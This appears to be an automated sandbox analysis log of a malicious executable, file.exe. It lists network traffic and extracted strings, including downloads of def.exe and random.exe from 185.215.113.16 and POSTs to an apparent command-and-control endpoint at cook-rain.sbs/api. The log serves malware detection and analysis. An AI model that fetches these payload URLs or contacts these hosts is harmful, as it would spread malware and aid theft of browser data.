              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: cook-rain.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
              Source: file.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Er
              Source: file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/jr
              Source: file.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exemX
              Source: file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeqX
              Source: file.exe, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_102.6.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1814353640.00000000054AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_102.6.dr, chromecache_103.6.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_102.6.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_102.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_102.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.1817114587.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.1817114587.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
              Source: file.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/%
              Source: file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/.
              Source: file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/9
              Source: file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/C
              Source: file.exe, file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812472132.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
              Source: file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apid
              Source: file.exe, 00000000.00000003.1812472132.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apirvice
              Source: file.exe, 00000000.00000003.1837908059.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1838507084.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1837932016.0000000000DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiu
              Source: file.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apivalue
              Source: file.exe, 00000000.00000003.1788518353.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1788475696.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/o
              Source: file.exe, 00000000.00000003.2017702605.0000000000D66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/tP
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_102.6.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.1817114587.0000000000DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chromecache_102.6.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: chromecache_84.6.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.1763866433.00000000054EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1763950622.00000000054E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763866433.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: file.exe, 00000000.00000003.1763950622.00000000054C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: file.exe, 00000000.00000003.1763950622.00000000054E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763866433.00000000054EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: file.exe, 00000000.00000003.1763950622.00000000054C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_84.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1764215214.00000000054BF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764331781.00000000054A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_94.6.dr, chromecache_84.6.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1816518420.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
